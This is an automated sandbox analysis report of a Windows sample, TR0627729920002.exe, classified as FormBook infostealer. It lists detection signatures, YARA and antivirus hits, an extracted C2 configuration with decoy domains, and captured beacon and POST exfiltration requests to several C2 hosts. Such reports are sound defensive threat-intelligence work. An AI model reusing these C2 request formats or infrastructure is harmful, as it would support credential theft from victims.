Windows Analysis Report
TR0627729920002.exe

Overview

General Information

Sample Name: TR0627729920002.exe
Analysis ID: 680563
MD5: 8dbfe68662123710d83fef939287d9a3
SHA1: 9481ef5498dd490e4efe83601f916ee48f61e649
SHA256: 663b7bc66499e507ca1f8fad6e42195a54fe242db3cc71bf4762952fe04ce5ee
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected UAC Bypass using ComputerDefaults
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Creates multiple autostart registry keys
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: TR0627729920002.exe ReversingLabs: Detection: 29%
Source: Yara match File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: http://www.trisuaka.xyz/uj3c/ Avira URL Cloud: Label: malware
Source: http://www.nomaxdic.com/uj3c/ Avira URL Cloud: Label: malware
Source: www.nutricognition.com/uj3c/ Avira URL Cloud: Label: malware
Source: kidsfundoor.com Virustotal: Detection: 7%
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe ReversingLabs: Detection: 29%
Source: TR0627729920002.exe Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Joe Sandbox ML: detected
Source: 5.2.cmd.exe.50410000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.cmd.exe.50410000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.cmd.exe.50410000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.TR0627729920002.exe.2162de8.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.cmd.exe.50410000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.cmd.exe.50410000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.nutricognition.com/uj3c/"], "decoy": ["copimetro.com", "choonchain.com", "luxxwireless.com", "fashionweekofcincinnati.com", "campingshare.net", "suncochina.com", "kidsfundoor.com", "testingnyc.co", "lovesoe.com", "vehiclesbeenrecord.com", "socialpearmarketing.com", "maxproductdji.com", "getallarticle.online", "forummind.com", "arenamarenostrum.com", "trisuaka.xyz", "designgamagazine.com", "chateaulehotel.com", "huangse5.com", "esginvestment.tech", "intercontinentalship.com", "moneytaoism.com", "agardenfortwo.com", "trendiddas.com", "fjuoomw.xyz", "dantvilla.com", "shopwithtrooperdavecom.com", "lanwenzong.com", "xpertsrealty.com", "gamelabsmash.com", "nomaxdic.com", "chillyracing.com", "mypleasure-blog.com", "projectkyla.com", "florurbana.com", "oneplacemexico.com", "gografic.com", "giantht.com", "dotombori-base.com", "westlifinance.online", "maacsecurity.com", "lydas.info", "instapandas.com", "labustiadepaper.net", "unglue52.com", "onurnet.net", "wellkept.info", "6111.site", "platinumroofingsusa.com", "bodyplex.fitness", "empireapothecary.com", "meigsbuilds.online", "garygrover.com", "nicholasnikas.com", "yd9992.com", "protections-clients.info", "sueyhzx.com", "naturathome.info", "superinformatico.net", "printsgarden.com", "xn--qn1b03fy2b841b.com", "preferable.info", "ozzyconstructionma.com", "10stopp.online"]}

Exploits

Source: Yara match File source: 0.2.TR0627729920002.exe.2162de8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.TR0627729920002.exe.2162de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.326814708.0000000002868000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.276683470.0000000002718000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.352406046.0000000000828000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.276153005.0000000002162000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Jwjxmakrv.exe PID: 5912, type: MEMORYSTR
Source: TR0627729920002.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
Source: Binary string: wntdll.pdb source: cmd.exe, cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: rundll32.pdbGCTL source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmd.pdb source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr

Networking

Source: C:\Windows\explorer.exe Domain query: www.gografic.com
Source: C:\Windows\explorer.exe Network Connect: 154.55.180.56 80
Source: C:\Windows\explorer.exe Domain query: www.moneytaoism.com
Source: C:\Windows\explorer.exe Domain query: www.naturathome.info
Source: C:\Windows\explorer.exe Domain query: www.6111.site
Source: C:\Windows\explorer.exe Network Connect: 5.183.8.187 80
Source: C:\Windows\explorer.exe Network Connect: 38.54.163.57 80
Source: C:\Windows\explorer.exe Domain query: www.kidsfundoor.com
Source: C:\Windows\explorer.exe Domain query: www.choonchain.com
Source: C:\Windows\explorer.exe Domain query: www.empireapothecary.com
Source: C:\Windows\explorer.exe Domain query: www.huangse5.com
Source: C:\Windows\explorer.exe Domain query: www.nutricognition.com
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.218 80
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.158 80
Source: C:\Windows\explorer.exe Domain query: www.trisuaka.xyz
Source: C:\Windows\explorer.exe Domain query: www.trendiddas.com
Source: C:\Windows\explorer.exe Domain query: www.nomaxdic.com
Source: C:\Windows\explorer.exe Network Connect: 188.114.97.3 80
Source: C:\Windows\explorer.exe Network Connect: 156.226.60.131 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.designgamagazine.com
Source: C:\Windows\explorer.exe Domain query: www.shopwithtrooperdavecom.com
Source: C:\Windows\explorer.exe Network Connect: 2.57.90.16 80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
Source: C:\Windows\explorer.exe DNS query: www.trisuaka.xyz
Source: Malware configuration extractor URLs: www.nutricognition.com/uj3c/
Source: Joe Sandbox View ASN Name: STRATOSTRATOAGDE
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=YWpgW+COIZOeD7RBAds2ahhkbsB0iwv6LNJvq1IjxaRtw/JoYlxZSXI6K9FgH36jX673 HTTP/1.1Host: www.meigsbuilds.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt HTTP/1.1Host: www.naturathome.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=aJ6ZN5DW6YxDAHX5hoqiKthR1Q3Gyr9jYIHooZSiQRwJPZTqb166CSRFwQJEcQMMTPqy HTTP/1.1Host: www.nutricognition.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=aL7cM5bWXy4HE7vWB0nbwz9R2nEE3UQV4bcsZzkldkiOPNKheX3xai9N2uMecq2n4iLl&aN68=XPUturKxIt HTTP/1.1Host: www.designgamagazine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=nXdwAKxpMTcrQ5TaEdKYb/3fLEm5MxmqnP6pt6tXZcCcrT8F9jyrfCLZmxy8K87KDFFG HTTP/1.1Host: www.kidsfundoor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=jp9IFxSAbKEUnISDMr23fKSuCkvCee63R6j+FOwVtZA50OWyPGwkYlgwJ8c08P9Q1FY9 HTTP/1.1Host: www.empireapothecary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1Host: www.moneytaoism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=QpZU5iWZZ+8RnceDxX1N22UuePdp1ta0hAtWyR6NsMGaje0l6aHG9rnjt2nJUX26kpQ0&aN68=XPUturKxIt HTTP/1.1Host: www.trendiddas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi HTTP/1.1Host: www.trisuaka.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /uj3c/?r4S0P=gHeddp3rEbyt6G4S2ENO5jUfv41eCHMoiHYIOJLTbAbXI9CsqM4W4jpYcdbraNUyjMQx&aN68=XPUturKxIt HTTP/1.1Host: www.nomaxdic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 81.169.145.158
Source: global traffic HTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.trisuaka.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.trisuaka.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trisuaka.xyz/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 75 46 58 50 6c 74 76 33 4f 4d 4b 75 6e 6c 37 76 54 46 38 4a 53 54 77 37 6f 43 6f 49 44 67 48 44 39 55 52 66 4b 49 63 49 53 4a 63 59 74 76 61 54 56 79 59 41 61 2d 4d 4d 51 52 33 75 66 65 45 55 70 39 63 54 4e 33 6f 76 4a 46 39 6c 65 53 38 68 64 74 76 63 58 45 64 54 31 43 7a 6b 37 43 46 69 44 34 30 39 52 44 4c 72 61 4f 4e 78 71 48 49 43 78 38 61 58 34 34 71 33 4c 5f 46 5a 48 6a 41 75 55 38 55 48 73 65 6b 63 6f 66 66 66 54 30 70 39 35 57 6c 73 50 70 4d 5a 6e 4e 56 52 52 7a 77 73 78 6a 57 52 64 6c 36 6c 70 49 6c 44 39 6b 76 38 61 73 57 61 4a 6c 32 78 53 67 6d 70 69 44 53 65 76 78 4e 51 6e 59 50 58 65 6e 6b 39 4c 56 66 52 59 4d 77 49 28 65 36 42 66 6d 71 2d 4d 66 59 4c 63 77 69 79 35 47 54 4f 4a 6c 34 65 38 48 37 74 49 62 28 69 45 4b 69 77 37 6d 6b 79 58 62 46 74 4d 57 37 74 38 53 41 56 42 6a 4e 53 70 6b 76 6e 50 58 61 6e 70 4f 75 59 76 33 6e 6e 37 41 5a 53 63 37 34 6e 4f 38 70 62 63 48 79 53 65 52 63 5a 65 53 78 52 67 6a 67 32 74 42 62 75 4f 79 47 4b 52 6a 45 70 75 54 32 62 33 6e 6c 74 65 63 31 46 37 51 4e 73 33 52 43 68 66 7a 51 53 31 47 38 61 44 31 72 59 65 6c 56 6e 4c 54 58 5f 37 48 52 71 39 4a 42 73 4d 4e 5a 30 32 61 35 7a 39 6d 41 54 52 56 69 58 44 6a 33 77 77 70 62 56 78 66 43 4e 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
Source: global traffic HTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.trisuaka.xyzConnection: closeContent-Length: 36479Cache-Control: no-cacheOrigin: http://www.trisuaka.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trisuaka.xyz/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 75 46 58 50 6c 70 76 6c 41 59 36 6e 34 46 6e 4d 51 32 63 47 63 43 41 35 37 69 73 39 4d 42 72 63 35 6c 42 68 4f 4a 41 31 44 39 30 30 70 66 47 2d 43 68 70 64 61 5f 39 69 4b 56 62 71 4f 76 34 4c 70 38 34 70 4e 30 45 76 59 7a 46 31 66 78 56 4d 63 50 33 66 57 6b 63 33 32 43 7a 32 32 6e 63 79 44 34 77 4c 52 44 44 37 61 5f 78 78 72 68 4d 43 35 64 61 71 79 34 72 79 47 65 6f 41 49 44 46 2d 55 38 64 61 73 63 77 63 6f 76 62 66 53 58 78 2d 28 55 4e 76 4d 4a 4e 54 73 74 56 45 45 6a 74 4c 78 6a 53 7a 64 6b 47 6c 71 2d 31 44 28 33 33 38 66 64 57 56 47 31 32 30 44 77 6e 72 70 6a 4f 50 76 78 52 45 6e 59 6e 70 65 54 6b 39 4e 31 66 63 61 72 4e 5f 70 5a 47 53 64 6c 33 55 4d 66 6b 78 62 68 75 51 35 43 43 64 65 48 51 31 7a 45 53 36 49 64 50 4d 43 71 69 30 7a 47 6b 6c 58 62 46 4a 4d 57 37 50 38 57 45 56 42 6b 5a 53 6f 43 72 6e 4a 32 61 6f 73 75 75 64 36 48 6e 46 34 77 6b 68 63 37 77 33 4f 38 68 39 63 77 53 53 66 77 73 5a 65 6e 63 48 31 7a 68 39 6a 68 62 4e 45 53 47 52 52 6a 45 62 75 52 4f 4c 33 51 39 74 65 49 68 46 38 79 31 73 78 68 43 68 44 6a 51 55 73 32 35 48 44 31 6a 55 65 6b 6c 52 4c 67 62 5f 37 56 5a 71 7a 49 42 73 50 39 5a 30 77 61 34 38 31 6a 68 71 56 79 32 58 42 69 54 4c 6e 4d 47 52 28 65 58 37 38 31 4f 5f 4d 63 44 44 63 66 6c 53 6a 56 6b 67 56 72 7a 56 67 4a 51 53 4b 64 76 34 37 51 77 65 73 53 38 4d 47 73 28 39 48 4e 64 4c 4b 6c 73 48 58 37 4e 54 6e 30 49 4e 37 6b 52 74 71 35 50 32 61 71 45 33 46 72 52 61 78 58 36 7a 47 52 31 30 61 47 36 44 33 5a 41 4f 4e 74 57 74 72 5f 70 43 35 48 57 32 6a 4c 54 53 73 44 66 65 47 5a 41 37 49 6a 30 67 68 53 31 
Source: global traffic HTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.nomaxdic.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.nomaxdic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nomaxdic.com/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4a 62 38 4a 4b 53 6d 76 30 4a 45 72 42 64 57 36 54 30 64 75 5a 46 55 50 30 45 57 6d 41 39 4d 55 65 37 49 56 67 7a 5f 59 65 53 6e 6f 70 74 53 77 6b 73 6e 44 49 37 4b 65 66 77 77 6b 5a 4a 36 77 67 66 49 6e 65 43 68 7a 58 70 75 77 6d 31 59 75 71 51 41 69 63 73 76 62 55 50 72 61 52 4c 37 47 58 6e 50 7a 6f 54 43 43 45 52 59 31 4e 33 53 31 67 77 41 53 48 41 36 4b 75 76 6a 33 73 68 38 71 48 39 6f 45 4e 48 48 77 56 57 79 69 44 69 48 39 69 76 32 57 78 57 52 6a 47 76 6a 44 6c 6a 4c 34 6a 4a 4d 43 4c 57 45 74 69 6a 69 4c 44 47 46 66 4a 67 68 54 5f 7a 4a 7a 71 69 76 65 7a 33 33 4c 55 47 72 77 34 39 53 74 69 74 2d 36 4a 53 4b 68 56 37 54 6b 59 61 43 33 73 62 4e 76 53 4e 49 66 4f 44 33 55 76 76 35 74 49 45 6e 51 31 53 75 53 56 71 37 7a 72 64 63 75 4d 6d 4c 79 32 5a 32 69 34 6f 54 70 67 48 6d 46 67 33 59 58 6c 45 58 61 2d 33 57 30 67 70 39 6d 33 34 34 28 67 4b 42 78 6d 49 5a 4e 58 37 51 6e 32 34 6c 79 39 5a 71 45 53 4e 75 71 54 6a 37 69 71 48 73 4e 5f 55 34 69 43 5a 6c 4c 65 61 74 53 39 38 2d 28 50 6e 68 4d 45 53 78 52 79 51 6e 6e 35 68 79 55 58 4e 75 63 30 7e 51 51 53 4e 52 6a 74 6f 36 76 52 67 6a 46 51 48 44 6c 70 35 74 61 68 48 44 30 6c 63 6a 69 58 79 37 52 4c 45 36 55 61 75 72 55 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
Source: global traffic HTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.nomaxdic.comConnection: closeContent-Length: 36479Cache-Control: no-cacheOrigin: http://www.nomaxdic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nomaxdic.com/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4d 6a 75 4e 36 7e 7a 71 6b 46 76 70 30 51 56 69 54 6b 66 76 6f 78 4c 44 57 41 4a 78 42 4e 69 4c 4c 28 66 55 6c 48 68 50 65 50 6f 73 75 68 77 77 6d 30 65 4f 64 54 4f 61 2d 4d 5f 6b 5a 78 41 77 67 54 49 67 65 72 2d 77 30 52 51 77 44 68 62 6f 4b 51 53 77 4d 73 6d 52 77 50 57 61 52 66 6a 47 58 75 43 7a 59 76 43 44 6d 5a 59 68 2d 76 62 74 67 77 5a 52 44 6b 32 56 2d 6a 2d 33 73 70 65 71 46 70 6f 44 39 62 48 78 77 65 7a 67 45 32 45 37 79 76 7a 54 78 58 42 74 6d 6a 33 44 6c 58 6c 34 69 6c 4d 46 35 69 45 74 7a 44 69 61 51 65 45 4c 70 67 6b 42 50 7a 2d 33 71 65 36 65 7a 72 7a 4c 51 28 51 7a 4e 56 53 76 53 74 5f 7e 61 44 33 32 53 62 45 33 59 75 6c 33 70 43 70 76 6e 74 51 66 4d 58 50 58 63 6e 4a 69 4b 73 42 51 7a 4b 45 43 46 71 5f 34 4c 64 39 75 4d 6d 72 79 32 5a 63 69 34 34 54 70 6a 6e 6d 46 46 37 59 42 58 38 51 44 2d 33 54 39 41 6f 36 69 33 31 44 28 67 69 72 78 6a 39 43 4d 67 44 51 68 6a 63 6c 33 38 5a 74 49 79 4e 73 6b 7a 6a 69 35 36 48 76 4e 5f 55 61 69 44 5a 31 4d 74 65 74 41 59 49 2d 34 74 28 68 4f 30 53 78 49 43 51 6c 73 5a 74 69 55 58 46 51 63 78 43 6d 51 6c 56 52 69 2d 67 36 68 51 67 6a 45 41 48 44 74 4a 34 73 4c 30 36 75 7a 56 49 4e 77 31 7e 32 62 38 64 33 5a 5a 75 67 44 4e 72 6a 6a 33 36 6b 59 37 39 78 61 41 39 5f 69 69 28 7a 58 30 67 71 52 42 57 57 28 68 55 68 31 48 39 55 55 73 41 5a 48 71 72 52 61 63 6f 32 7a 46 52 4a 70 37 51 79 4a 43 58 55 53 63 5a 45 35 4a 68 66 62 65 78 67 46 52 5a 32 43 7a 78 73 73 39 71 5f 68 71 76 50 72 63 31 77 44 43 53 55 37 6d 47 48 57 79 78 6b 78 42 7a 73 56 63 52 65 36 71 65 6f 54 62 7e 
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
